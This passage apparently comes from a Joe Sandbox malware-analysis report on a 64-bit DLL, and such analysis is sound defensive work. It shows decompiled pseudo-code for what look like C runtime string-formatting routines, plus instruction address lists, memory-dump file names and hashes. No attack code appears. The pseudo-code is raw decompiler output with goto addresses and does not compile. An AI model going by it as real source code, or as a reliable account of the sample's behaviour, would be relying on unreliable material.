                                                                      				if ( *_t335 == 0xfffffffe) goto 0x8002cff5;
                                                                      				if (r13d + r12d - r15d < 0) goto 0x8002cfab;
                                                                      				goto 0x8002cff5;
                                                                      				 *_t335 =  *_t335 | 0xffffffff;
                                                                      				if ( *((intOrPtr*)(_t310 + 0x4c)) != r13b) goto 0x8002d126;
                                                                      				if ( *((intOrPtr*)(_t310 + 0x48)) <= 0) goto 0x8002d126;
                                                                      				_t362 =  *((intOrPtr*)(_t310 + 8));
                                                                      				if ( *((intOrPtr*)(_t362 + 0x28)) != 0) goto 0x8002d023;
                                                                      				E000000011800338E0( *_t363, _t310, _t362,  *_t363, _t335);
                                                                      				if ( *((intOrPtr*)(_t310 + 0x48)) == 0) goto 0x8002d0a8;
                                                                      				_t90 = _t362 + 0x18; // 0x4c08245c8948cccc
                                                                      				_v72 = 0;
                                                                      				_t316 =  &_v72;
                                                                      				if (E00000001180040E3C(0, _t224, _t310, _t316,  *((intOrPtr*)(_t310 + 0x40)), _t331 + 2, _t335,  *((intOrPtr*)(_t310 + 0x40)),  *((intOrPtr*)( *_t90 + 8)),  *((intOrPtr*)(_t310 + 8))) <= 0) goto 0x8002d11a;
                                                                      				if (( *( *_t363 + 0x14) >> 0x0000000c & 0x00000001) == 0) goto 0x8002d077;
                                                                      				if ( *((long long*)( *_t363 + 8)) == 0) goto 0x8002d089;
                                                                      				if (E000000011800414D8(_v72 & 0x0000ffff, _t310,  *_t363,  *((intOrPtr*)(_t310 + 8)),  *((intOrPtr*)(_t310 + 8))) == 0xffff) goto 0x8002d08e;
                                                                      				 *(_t310 + 0x20) =  *(_t310 + 0x20) + 1;
                                                                      				goto 0x8002d092;
                                                                      				 *(_t310 + 0x20) =  *(_t310 + 0x20) | 0xffffffff;
                                                                      				r12d = 1;
                                                                      				if (0 + r12d !=  *((intOrPtr*)(_t310 + 0x48))) goto 0x8002d02d;
                                                                      				r13d = 0;
                                                                      				if ( *_t335 - r13d < 0) goto 0x8002d16c;
                                                                      				if ((r12b & 0) == 0) goto 0x8002d16c;
                                                                      				if (r15d <= 0) goto 0x8002d16c;
                                                                      				if ((r12b &  *( *_t363 + 0x14) >> 0x0000000c) == 0) goto 0x8002d0ea;
                                                                      				if ( *((intOrPtr*)( *_t363 + 8)) == _t362) goto 0x8002d104;
                                                                      				if (E000000011800414D8(0x20, _t310,  *_t363,  *((intOrPtr*)(_t310 + 8)),  *((intOrPtr*)(_t310 + 8))) == 0xffff) goto 0x8002d169;
                                                                      				_t115 = _t316 + 1; // 0x10000
                                                                      				 *_t335 = _t115;
                                                                      				if ( *_t335 == 0xfffffffe) goto 0x8002d16c;
                                                                      				if (r13d + r12d - r15d < 0) goto 0x8002d0d3;
                                                                      				goto 0x8002d16c;
                                                                      				 *(_t310 + 0x20) =  *(_t310 + 0x20) | 0xffffffff;
                                                                      				r12d = 1;
                                                                      				goto 0x8002d0a8;
                                                                      				r8d =  *((intOrPtr*)(_t310 + 0x48));
                                                                      				if ((r12b &  *( *_t363 + 0x14) >> 0x0000000c) == 0) goto 0x8002d151;
                                                                      				if ( *((intOrPtr*)( *_t363 + 8)) != _t362) goto 0x8002d151;
                                                                      				 *_t335 =  *_t335 + r8d;
                                                                      				goto 0x8002d0ab;
                                                                      				_v88 =  *((intOrPtr*)(_t310 + 8));
                                                                      				E000000011800362BC(_t310, _t363,  *((intOrPtr*)(_t310 + 0x40)), _t335,  *((intOrPtr*)(_t310 + 0x40)) + _t168, _t335);
                                                                      				goto 0x8002d0ab;
                                                                      				 *_t335 =  *_t335 | 0xffffffff;
                                                                      				return E000000011800028F0(r12b,  *( *_t363 + 0x14) >> 0xc, _v56 ^ _t344);
                                                                      			}






































                                                                      0x18002cccc
                                                                      0x18002cccc
                                                                      0x18002cccc
                                                                      0x18002cccc
                                                                      0x18002cccc
                                                                      0x18002cccc
                                                                      0x18002cccc
                                                                      0x18002cccc
                                                                      0x18002ccd1
                                                                      0x18002ccd6
                                                                      0x18002cce4
                                                                      0x18002cce8
                                                                      0x18002ccf2
                                                                      0x18002ccf7
                                                                      0x18002cd00
                                                                      0x18002cd03
                                                                      0x18002cd03
                                                                      0x18002cd06
                                                                      0x18002cd06
                                                                      0x18002cd0a
                                                                      0x18002cd0e
                                                                      0x18002cd10
                                                                      0x18002cd1a
                                                                      0x18002cd24
                                                                      0x18002cd2a
                                                                      0x18002cd34
                                                                      0x18002cd3e
                                                                      0x18002cd43
                                                                      0x18002cd49
                                                                      0x18002cd4f
                                                                      0x18002cd59
                                                                      0x18002cd61
                                                                      0x18002cd66
                                                                      0x18002cd6b
                                                                      0x18002cd70
                                                                      0x18002cd78
                                                                      0x18002cd7d
                                                                      0x18002cd86
                                                                      0x18002cd8c
                                                                      0x18002cd92
                                                                      0x18002cd98
                                                                      0x18002cd9e
                                                                      0x18002cda4
                                                                      0x18002cdaa
                                                                      0x18002cdaf
                                                                      0x18002cdb3
                                                                      0x18002cdb5
                                                                      0x18002cdba
                                                                      0x18002cdbc
                                                                      0x18002cdc3
                                                                      0x18002cdca
                                                                      0x18002cdcc
                                                                      0x18002cdd7
                                                                      0x18002cdd9
                                                                      0x18002cddd
                                                                      0x18002cde2
                                                                      0x18002cde5
                                                                      0x18002cdea
                                                                      0x18002cdec
                                                                      0x18002cdf1
                                                                      0x18002cdf3
                                                                      0x18002cdf9
                                                                      0x18002cdfe
                                                                      0x18002ce00
                                                                      0x18002ce05
                                                                      0x18002ce0a
                                                                      0x18002ce0e
                                                                      0x18002ce17
                                                                      0x18002ce1d
                                                                      0x18002ce22
                                                                      0x18002ce29
                                                                      0x18002ce2e
                                                                      0x18002ce3c
                                                                      0x18002ce46
                                                                      0x18002ce4c
                                                                      0x18002ce51
                                                                      0x18002ce56
                                                                      0x18002ce5d
                                                                      0x18002ce66
                                                                      0x18002ce68
                                                                      0x18002ce6e
                                                                      0x18002ce71
                                                                      0x18002ce75
                                                                      0x18002ce85
                                                                      0x18002ce89
                                                                      0x18002ce92
                                                                      0x18002ce94
                                                                      0x18002ce9e
                                                                      0x18002ceaa
                                                                      0x18002ceae
                                                                      0x18002ceb0
                                                                      0x18002ceb9
                                                                      0x18002cebf
                                                                      0x18002cec4
                                                                      0x18002cecd
                                                                      0x18002ced1
                                                                      0x18002ced7
                                                                      0x18002cedb
                                                                      0x18002cee1
                                                                      0x18002ceed
                                                                      0x18002ceff
                                                                      0x18002cf0c
                                                                      0x18002cf24
                                                                      0x18002cf26
                                                                      0x18002cf32
                                                                      0x18002cf38
                                                                      0x18002cf40
                                                                      0x18002cf42
                                                                      0x18002cf44
                                                                      0x18002cf4c
                                                                      0x18002cf56
                                                                      0x18002cf63
                                                                      0x18002cf6c
                                                                      0x18002cf6e
                                                                      0x18002cf70
                                                                      0x18002cf72
                                                                      0x18002cf7f
                                                                      0x18002cf82
                                                                      0x18002cf85
                                                                      0x18002cf95
                                                                      0x18002cf9d
                                                                      0x18002cfa9
                                                                      0x18002cfb7
                                                                      0x18002cfc0
                                                                      0x18002cfda
                                                                      0x18002cfde
                                                                      0x18002cfe1
                                                                      0x18002cfe6
                                                                      0x18002cfee
                                                                      0x18002cff0
                                                                      0x18002cff2
                                                                      0x18002cff9
                                                                      0x18002d004
                                                                      0x18002d00a
                                                                      0x18002d014
                                                                      0x18002d019
                                                                      0x18002d02b
                                                                      0x18002d02d
                                                                      0x18002d038
                                                                      0x18002d03d
                                                                      0x18002d050
                                                                      0x18002d06b
                                                                      0x18002d075
                                                                      0x18002d087
                                                                      0x18002d089
                                                                      0x18002d08c
                                                                      0x18002d08e
                                                                      0x18002d095
                                                                      0x18002d0a6
                                                                      0x18002d0a8
                                                                      0x18002d0ae
                                                                      0x18002d0bd
                                                                      0x18002d0cd
                                                                      0x18002d0df
                                                                      0x18002d0e8
                                                                      0x18002d102
                                                                      0x18002d106
                                                                      0x18002d109
                                                                      0x18002d10e
                                                                      0x18002d116
                                                                      0x18002d118
                                                                      0x18002d11a
                                                                      0x18002d11e
                                                                      0x18002d124
                                                                      0x18002d12d
                                                                      0x18002d13e
                                                                      0x18002d147
                                                                      0x18002d149
                                                                      0x18002d14c
                                                                      0x18002d151
                                                                      0x18002d15f
                                                                      0x18002d164
                                                                      0x18002d169
                                                                      0x18002d199

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2e5306d572ec6042d4ee2470e7664592b19945edf766be0a8804a6cd629e04ec
                                                                      • Instruction ID: e3f56a40636832230b55b757e182cdc7a1f7076bcd3108387d85e5c6dc8352c0
                                                                      • Opcode Fuzzy Hash: 2e5306d572ec6042d4ee2470e7664592b19945edf766be0a8804a6cd629e04ec
                                                                      • Instruction Fuzzy Hash: E8E1DF3620064886EBEB9F298040BEA37A1F74CBC4F59C126AE45477D4DF35CE8AC342
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 62%
                                                                      			E0000000118002D680(intOrPtr __edi, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v40;
                                                                      				signed int _v56;
                                                                      				short _v64;
                                                                      				char _v68;
                                                                      				signed short _v72;
                                                                      				long long _v88;
                                                                      				void* __rdi;
                                                                      				signed int _t131;
                                                                      				void* _t134;
                                                                      				void* _t141;
                                                                      				void* _t179;
                                                                      				unsigned int _t180;
                                                                      				signed char _t181;
                                                                      				signed short _t212;
                                                                      				intOrPtr _t215;
                                                                      				signed short _t224;
                                                                      				void* _t225;
                                                                      				signed long long _t294;
                                                                      				long long _t310;
                                                                      				long long _t312;
                                                                      				long long _t313;
                                                                      				intOrPtr* _t314;
                                                                      				signed short* _t316;
                                                                      				void* _t320;
                                                                      				signed long long _t331;
                                                                      				signed int* _t335;
                                                                      				void* _t343;
                                                                      				signed long long _t344;
                                                                      				void* _t346;
                                                                      				void* _t352;
                                                                      				void* _t356;
                                                                      				signed long long _t359;
                                                                      				void* _t361;
                                                                      				intOrPtr _t362;
                                                                      				intOrPtr* _t363;
                                                                      
                                                                      				_t356 = __r10;
                                                                      				_t346 = __r8;
                                                                      				_t337 = __rbp;
                                                                      				_t334 = __rsi;
                                                                      				_t320 = __rdx;
                                                                      				_t312 = __rcx;
                                                                      				_t215 = __edi;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_a32 = __rsi;
                                                                      				_t344 = _t343 - 0x50;
                                                                      				_t294 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_v56 = _t294 ^ _t344;
                                                                      				_t131 =  *(__rcx + 0x3a) & 0x0000ffff;
                                                                      				_t310 = __rcx;
                                                                      				_t6 = _t334 - 0x20; // 0x58
                                                                      				_t224 = _t6;
                                                                      				_t7 = _t334 - 0x77; // 0x1
                                                                      				r12d = _t7;
                                                                      				_t225 = _t131 - 0x64;
                                                                      				if (_t225 > 0) goto 0x8002d736;
                                                                      				if (_t225 == 0) goto 0x8002d7a7;
                                                                      				if (_t131 == 0x41) goto 0x8002d7b4;
                                                                      				if (_t131 == 0x43) goto 0x8002d713;
                                                                      				if (_t131 - 0x44 <= 0) goto 0x8002d7c0;
                                                                      				if (_t131 - 0x47 <= 0) goto 0x8002d7b4;
                                                                      				if (_t131 == 0x53) goto 0x8002d769;
                                                                      				if (_t131 == _t224) goto 0x8002d729;
                                                                      				if (_t131 == 0x5a) goto 0x8002d71f;
                                                                      				if (_t131 == 0x61) goto 0x8002d7b4;
                                                                      				if (_t131 != 0x63) goto 0x8002d7c0;
                                                                      				E00000001180031710(_t131 - 0x63, __rcx, __rcx, __rsi);
                                                                      				goto 0x8002d7b9;
                                                                      				E0000000118002F0F0(_t179, __rcx, __rcx, _t334);
                                                                      				goto 0x8002d7b9;
                                                                      				_t134 = E0000000118001F334(r12b, __rcx, __rcx, _t320, _t334, __rbp, _t346, __r10);
                                                                      				goto 0x8002d7b9;
                                                                      				if (_t134 - 0x67 <= 0) goto 0x8002d7b4;
                                                                      				if (_t134 == 0x69) goto 0x8002d7a7;
                                                                      				if (_t134 == 0x6e) goto 0x8002d7a0;
                                                                      				if (_t134 == 0x6f) goto 0x8002d780;
                                                                      				if (_t134 == 0x70) goto 0x8002d770;
                                                                      				if (_t134 == 0x73) goto 0x8002d769;
                                                                      				if (_t134 == 0x75) goto 0x8002d7ab;
                                                                      				if (_t134 != 0x78) goto 0x8002d7c0;
                                                                      				goto 0x8002d72c;
                                                                      				E00000001180032BA0(__rcx, __rcx, _t334);
                                                                      				goto 0x8002d7b9;
                                                                      				 *((intOrPtr*)(_t312 + 0x30)) = 0x10;
                                                                      				 *((intOrPtr*)(_t312 + 0x34)) = 0xb;
                                                                      				goto 0x8002d729;
                                                                      				_t180 =  *(_t312 + 0x28);
                                                                      				if ((r12b & _t180 >> 0x00000005) == 0) goto 0x8002d794;
                                                                      				asm("bts ecx, 0x7");
                                                                      				 *(_t310 + 0x28) = _t180;
                                                                      				_t313 = _t310;
                                                                      				E0000000118001C324(0, _t310, _t313, _t320, _t334, _t337, _t346, __r10);
                                                                      				goto 0x8002d7b9;
                                                                      				E00000001180032114(_t310, _t313);
                                                                      				goto 0x8002d7b9;
                                                                      				 *(_t313 + 0x28) =  *(_t313 + 0x28) | 0x00000010;
                                                                      				E0000000118001DB2C(0, _t310, _t313, _t320, _t334, _t337, _t346, __r10);
                                                                      				goto 0x8002d7b9;
                                                                      				_t141 = E00000001180030618(0, _t215, _t310, _t313, _t337);
                                                                      				r13d = 0;
                                                                      				if (_t141 != 0) goto 0x8002d7c7;
                                                                      				goto 0x8002db23;
                                                                      				if ( *((intOrPtr*)(_t310 + 0x38)) != r13b) goto 0x8002db20;
                                                                      				_t181 =  *(_t310 + 0x28);
                                                                      				_v68 = 0;
                                                                      				_v64 = 0;
                                                                      				r10d = 0x20;
                                                                      				if ((r12b & 0) == 0) goto 0x8002d825;
                                                                      				if ((r12b & 0) == 0) goto 0x8002d807;
                                                                      				_v68 = _t356 + 0xd;
                                                                      				goto 0x8002d822;
                                                                      				if ((r12b & _t181) == 0) goto 0x8002d813;
                                                                      				goto 0x8002d800;
                                                                      				if ((r12b & 0) == 0) goto 0x8002d825;
                                                                      				_v68 = r10w;
                                                                      				_t331 = _t359;
                                                                      				_t212 =  *(_t310 + 0x3a) & 0x0000ffff;
                                                                      				r9d = 0xffdf;
                                                                      				if ((r9w & (_t212 & 0x0000ffff) - _t224) != 0) goto 0x8002d848;
                                                                      				r8b = r12b;
                                                                      				if ((r12b & 0) != 0) goto 0x8002d84b;
                                                                      				r8b = r13b;
                                                                      				r9d = 0x30;
                                                                      				if (r8b != 0) goto 0x8002d864;
                                                                      				if (0 == 0) goto 0x8002d881;
                                                                      				 *(_t344 + 0x34 + _t331 * 2) = r9w;
                                                                      				if (_t212 == _t224) goto 0x8002d875;
                                                                      				if (_t212 != 0x41) goto 0x8002d878;
                                                                      				 *((short*)(_t344 + 0x36 + _t331 * 2)) = _t224 & 0x0000ffff;
                                                                      				r15d =  *((intOrPtr*)(_t310 + 0x2c));
                                                                      				r14d = 0xffff;
                                                                      				r15d = r15d -  *((intOrPtr*)(_t310 + 0x48));
                                                                      				r15d = r15d - _t215;
                                                                      				if ((_t181 & 0x0000000c) != 0) goto 0x8002d8fc;
                                                                      				if (r15d <= 0) goto 0x8002d8fc;
                                                                      				if ((r12b &  *( *((intOrPtr*)(_t310 + 0x460)) + 0x14) >> 0x0000000c) == 0) goto 0x8002d8c2;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t310 + 0x460)) + 8)) == _t361) goto 0x8002d8e0;
                                                                      				if (E000000011800414D8(r10d, _t310,  *((intOrPtr*)(_t310 + 0x460)),  *((intOrPtr*)(_t310 + 8)), _t352) == r14w) goto 0x8002d8f8;
                                                                      				r10d = 0x20;
                                                                      				 *(_t310 + 0x20) = _t313 + 1;
                                                                      				if ( *(_t310 + 0x20) == 0xfffffffe) goto 0x8002d8fc;
                                                                      				if (r13d + r12d - r15d < 0) goto 0x8002d8a3;
                                                                      				goto 0x8002d8fc;
                                                                      				 *(_t310 + 0x20) =  *(_t310 + 0x20) | 0xffffffff;
                                                                      				_t363 = _t310 + 0x460;
                                                                      				_t335 = _t310 + 0x20;
                                                                      				if ((r12b &  *( *_t363 + 0x14) >> 0x0000000c) == 0) goto 0x8002d926;
                                                                      				if ( *((intOrPtr*)( *_t363 + 8)) != _t361) goto 0x8002d926;
                                                                      				 *_t335 =  *_t335 + _t215;
                                                                      				goto 0x8002d93e;
                                                                      				_v88 =  *((intOrPtr*)(_t310 + 8));
                                                                      				r8d = _t215;
                                                                      				_t314 = _t363;
                                                                      				E000000011800362BC(_t310, _t314,  &_v68, _t335,  *((intOrPtr*)(_t310 + 8)), _t335);
                                                                      				if ((r12b & 0) == 0) goto 0x8002d9a9;
                                                                      				if ((r12b &  *(_t310 + 0x28) >> 0x00000002) != 0) goto 0x8002d9a9;
                                                                      				if (r15d <= 0) goto 0x8002d9a9;
                                                                      				if ((r12b &  *( *_t363 + 0x14) >> 0x0000000c) == 0) goto 0x8002d976;
                                                                      				if ( *((intOrPtr*)( *_t363 + 8)) == _t361) goto 0x8002d990;
                                                                      				if (E000000011800414D8(0x30, _t310,  *_t363,  *((intOrPtr*)(_t310 + 8)), _t335) == 0xffff) goto 0x8002d9a6;
                                                                      				_t83 = _t314 + 1; // 0x10000
                                                                      				 *_t335 = _t83;
                                                                      				if ( *_t335 == 0xfffffffe) goto 0x8002d9a9;
                                                                      				if (r13d + r12d - r15d < 0) goto 0x8002d95f;
                                                                      				goto 0x8002d9a9;
                                                                      				 *_t335 =  *_t335 | 0xffffffff;
                                                                      				if ( *((intOrPtr*)(_t310 + 0x4c)) != r13b) goto 0x8002dada;
                                                                      				if ( *((intOrPtr*)(_t310 + 0x48)) <= 0) goto 0x8002dada;
                                                                      				_t362 =  *((intOrPtr*)(_t310 + 8));
                                                                      				if ( *((intOrPtr*)(_t362 + 0x28)) != 0) goto 0x8002d9d7;
                                                                      				E000000011800338E0( *_t363, _t310, _t362,  *_t363, _t335);
                                                                      				if ( *((intOrPtr*)(_t310 + 0x48)) == 0) goto 0x8002da5c;
                                                                      				_t90 = _t362 + 0x18; // 0x4c08245c8948cccc
                                                                      				_v72 = 0;
                                                                      				_t316 =  &_v72;
                                                                      				if (E00000001180040E3C(0, _t224, _t310, _t316,  *((intOrPtr*)(_t310 + 0x40)), _t331 + 2, _t335,  *((intOrPtr*)(_t310 + 0x40)),  *((intOrPtr*)( *_t90 + 8)),  *((intOrPtr*)(_t310 + 8))) <= 0) goto 0x8002dace;
                                                                      				if (( *( *_t363 + 0x14) >> 0x0000000c & 0x00000001) == 0) goto 0x8002da2b;
                                                                      				if ( *((long long*)( *_t363 + 8)) == 0) goto 0x8002da3d;
                                                                      				if (E000000011800414D8(_v72 & 0x0000ffff, _t310,  *_t363,  *((intOrPtr*)(_t310 + 8)),  *((intOrPtr*)(_t310 + 8))) == 0xffff) goto 0x8002da42;
                                                                      				 *(_t310 + 0x20) =  *(_t310 + 0x20) + 1;
                                                                      				goto 0x8002da46;
                                                                      				 *(_t310 + 0x20) =  *(_t310 + 0x20) | 0xffffffff;
                                                                      				r12d = 1;
                                                                      				if (0 + r12d !=  *((intOrPtr*)(_t310 + 0x48))) goto 0x8002d9e1;
                                                                      				r13d = 0;
                                                                      				if ( *_t335 - r13d < 0) goto 0x8002db20;
                                                                      				if ((r12b & 0) == 0) goto 0x8002db20;
                                                                      				if (r15d <= 0) goto 0x8002db20;
                                                                      				if ((r12b &  *( *_t363 + 0x14) >> 0x0000000c) == 0) goto 0x8002da9e;
                                                                      				if ( *((intOrPtr*)( *_t363 + 8)) == _t362) goto 0x8002dab8;
                                                                      				if (E000000011800414D8(0x20, _t310,  *_t363,  *((intOrPtr*)(_t310 + 8)),  *((intOrPtr*)(_t310 + 8))) == 0xffff) goto 0x8002db1d;
                                                                      				_t115 = _t316 + 1; // 0x10000
                                                                      				 *_t335 = _t115;
                                                                      				if ( *_t335 == 0xfffffffe) goto 0x8002db20;
                                                                      				if (r13d + r12d - r15d < 0) goto 0x8002da87;
                                                                      				goto 0x8002db20;
                                                                      				 *(_t310 + 0x20) =  *(_t310 + 0x20) | 0xffffffff;
                                                                      				r12d = 1;
                                                                      				goto 0x8002da5c;
                                                                      				r8d =  *((intOrPtr*)(_t310 + 0x48));
                                                                      				if ((r12b &  *( *_t363 + 0x14) >> 0x0000000c) == 0) goto 0x8002db05;
                                                                      				if ( *((intOrPtr*)( *_t363 + 8)) != _t362) goto 0x8002db05;
                                                                      				 *_t335 =  *_t335 + r8d;
                                                                      				goto 0x8002da5f;
                                                                      				_v88 =  *((intOrPtr*)(_t310 + 8));
                                                                      				E000000011800362BC(_t310, _t363,  *((intOrPtr*)(_t310 + 0x40)), _t335,  *((intOrPtr*)(_t310 + 0x40)) + _t168, _t335);
                                                                      				goto 0x8002da5f;
                                                                      				 *_t335 =  *_t335 | 0xffffffff;
                                                                      				return E000000011800028F0(r12b,  *( *_t363 + 0x14) >> 0xc, _v56 ^ _t344);
                                                                      			}






































                                                                      0x18002d680
                                                                      0x18002d680
                                                                      0x18002d680
                                                                      0x18002d680
                                                                      0x18002d680
                                                                      0x18002d680
                                                                      0x18002d680
                                                                      0x18002d680
                                                                      0x18002d685
                                                                      0x18002d68a
                                                                      0x18002d698
                                                                      0x18002d69c
                                                                      0x18002d6a6
                                                                      0x18002d6ab
                                                                      0x18002d6b4
                                                                      0x18002d6b7
                                                                      0x18002d6b7
                                                                      0x18002d6ba
                                                                      0x18002d6ba
                                                                      0x18002d6be
                                                                      0x18002d6c2
                                                                      0x18002d6c4
                                                                      0x18002d6ce
                                                                      0x18002d6d8
                                                                      0x18002d6de
                                                                      0x18002d6e8
                                                                      0x18002d6f2
                                                                      0x18002d6f7
                                                                      0x18002d6fd
                                                                      0x18002d703
                                                                      0x18002d70d
                                                                      0x18002d715
                                                                      0x18002d71a
                                                                      0x18002d71f
                                                                      0x18002d724
                                                                      0x18002d72c
                                                                      0x18002d731
                                                                      0x18002d73a
                                                                      0x18002d740
                                                                      0x18002d746
                                                                      0x18002d74c
                                                                      0x18002d752
                                                                      0x18002d758
                                                                      0x18002d75e
                                                                      0x18002d763
                                                                      0x18002d767
                                                                      0x18002d769
                                                                      0x18002d76e
                                                                      0x18002d770
                                                                      0x18002d777
                                                                      0x18002d77e
                                                                      0x18002d780
                                                                      0x18002d78b
                                                                      0x18002d78d
                                                                      0x18002d791
                                                                      0x18002d796
                                                                      0x18002d799
                                                                      0x18002d79e
                                                                      0x18002d7a0
                                                                      0x18002d7a5
                                                                      0x18002d7a7
                                                                      0x18002d7ad
                                                                      0x18002d7b2
                                                                      0x18002d7b4
                                                                      0x18002d7b9
                                                                      0x18002d7be
                                                                      0x18002d7c2
                                                                      0x18002d7cb
                                                                      0x18002d7d1
                                                                      0x18002d7d6
                                                                      0x18002d7dd
                                                                      0x18002d7e2
                                                                      0x18002d7f0
                                                                      0x18002d7fa
                                                                      0x18002d800
                                                                      0x18002d805
                                                                      0x18002d80a
                                                                      0x18002d811
                                                                      0x18002d81a
                                                                      0x18002d81c
                                                                      0x18002d822
                                                                      0x18002d825
                                                                      0x18002d829
                                                                      0x18002d839
                                                                      0x18002d83d
                                                                      0x18002d846
                                                                      0x18002d848
                                                                      0x18002d852
                                                                      0x18002d85e
                                                                      0x18002d862
                                                                      0x18002d864
                                                                      0x18002d86d
                                                                      0x18002d873
                                                                      0x18002d878
                                                                      0x18002d881
                                                                      0x18002d885
                                                                      0x18002d88b
                                                                      0x18002d88f
                                                                      0x18002d895
                                                                      0x18002d8a1
                                                                      0x18002d8b3
                                                                      0x18002d8c0
                                                                      0x18002d8d8
                                                                      0x18002d8da
                                                                      0x18002d8e6
                                                                      0x18002d8ec
                                                                      0x18002d8f4
                                                                      0x18002d8f6
                                                                      0x18002d8f8
                                                                      0x18002d900
                                                                      0x18002d90a
                                                                      0x18002d917
                                                                      0x18002d920
                                                                      0x18002d922
                                                                      0x18002d924
                                                                      0x18002d926
                                                                      0x18002d933
                                                                      0x18002d936
                                                                      0x18002d939
                                                                      0x18002d949
                                                                      0x18002d951
                                                                      0x18002d95d
                                                                      0x18002d96b
                                                                      0x18002d974
                                                                      0x18002d98e
                                                                      0x18002d992
                                                                      0x18002d995
                                                                      0x18002d99a
                                                                      0x18002d9a2
                                                                      0x18002d9a4
                                                                      0x18002d9a6
                                                                      0x18002d9ad
                                                                      0x18002d9b8
                                                                      0x18002d9be
                                                                      0x18002d9c8
                                                                      0x18002d9cd
                                                                      0x18002d9df
                                                                      0x18002d9e1
                                                                      0x18002d9ec
                                                                      0x18002d9f1
                                                                      0x18002da04
                                                                      0x18002da1f
                                                                      0x18002da29
                                                                      0x18002da3b
                                                                      0x18002da3d
                                                                      0x18002da40
                                                                      0x18002da42
                                                                      0x18002da49
                                                                      0x18002da5a
                                                                      0x18002da5c
                                                                      0x18002da62
                                                                      0x18002da71
                                                                      0x18002da81
                                                                      0x18002da93
                                                                      0x18002da9c
                                                                      0x18002dab6
                                                                      0x18002daba
                                                                      0x18002dabd
                                                                      0x18002dac2
                                                                      0x18002daca
                                                                      0x18002dacc
                                                                      0x18002dace
                                                                      0x18002dad2
                                                                      0x18002dad8
                                                                      0x18002dae1
                                                                      0x18002daf2
                                                                      0x18002dafb
                                                                      0x18002dafd
                                                                      0x18002db00
                                                                      0x18002db05
                                                                      0x18002db13
                                                                      0x18002db18
                                                                      0x18002db1d
                                                                      0x18002db4d

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 48fc95ef34edeecbd711b5be0b31462975f4aed55ec2d77ad0e7b33a7d298762
                                                                      • Instruction ID: bb7e6342cc5d936864533e864b019376c3ef21b05198d1fc1f66badb99e38675
                                                                      • Opcode Fuzzy Hash: 48fc95ef34edeecbd711b5be0b31462975f4aed55ec2d77ad0e7b33a7d298762
                                                                      • Instruction Fuzzy Hash: 9AE1DE3620464D86EBEB9E1980503E923A1F748BD8F59D117AE85073D9DFB9CE8AC301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0000000118003E0D0(void* __rcx, long long __rdx, long long __r8, void* __r9) {
                                                                      				void* _t12;
                                                                      				signed long long _t15;
                                                                      				void* _t25;
                                                                      				void* _t26;
                                                                      				signed long long _t27;
                                                                      
                                                                      				_t25 = _t26 - 0x168;
                                                                      				_t27 = _t26 - 0x268;
                                                                      				_t15 =  *0x80070098; // 0xd02b0a549a3
                                                                      				 *(_t25 + 0x150) = _t15 ^ _t27;
                                                                      				r15d = 0;
                                                                      				 *((long long*)(_t27 + 0x70)) = __r8;
                                                                      				 *((long long*)(_t27 + 0x78)) = __rdx;
                                                                      				 *((long long*)(_t27 + 0x30)) =  *((intOrPtr*)(_t25 + 0x1d0));
                                                                      				 *((long long*)(_t27 + 0x68)) =  *((intOrPtr*)(_t25 + 0x1d8));
                                                                      				if (__rcx != 0) goto 0x8003e158;
                                                                      				return E000000011800028F0(0, _t12,  *(_t25 + 0x150) ^ _t27);
                                                                      			}








                                                                      0x18003e0dd
                                                                      0x18003e0e5
                                                                      0x18003e0ec
                                                                      0x18003e0f6
                                                                      0x18003e104
                                                                      0x18003e111
                                                                      0x18003e119
                                                                      0x18003e121
                                                                      0x18003e129
                                                                      0x18003e131
                                                                      0x18003e157

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
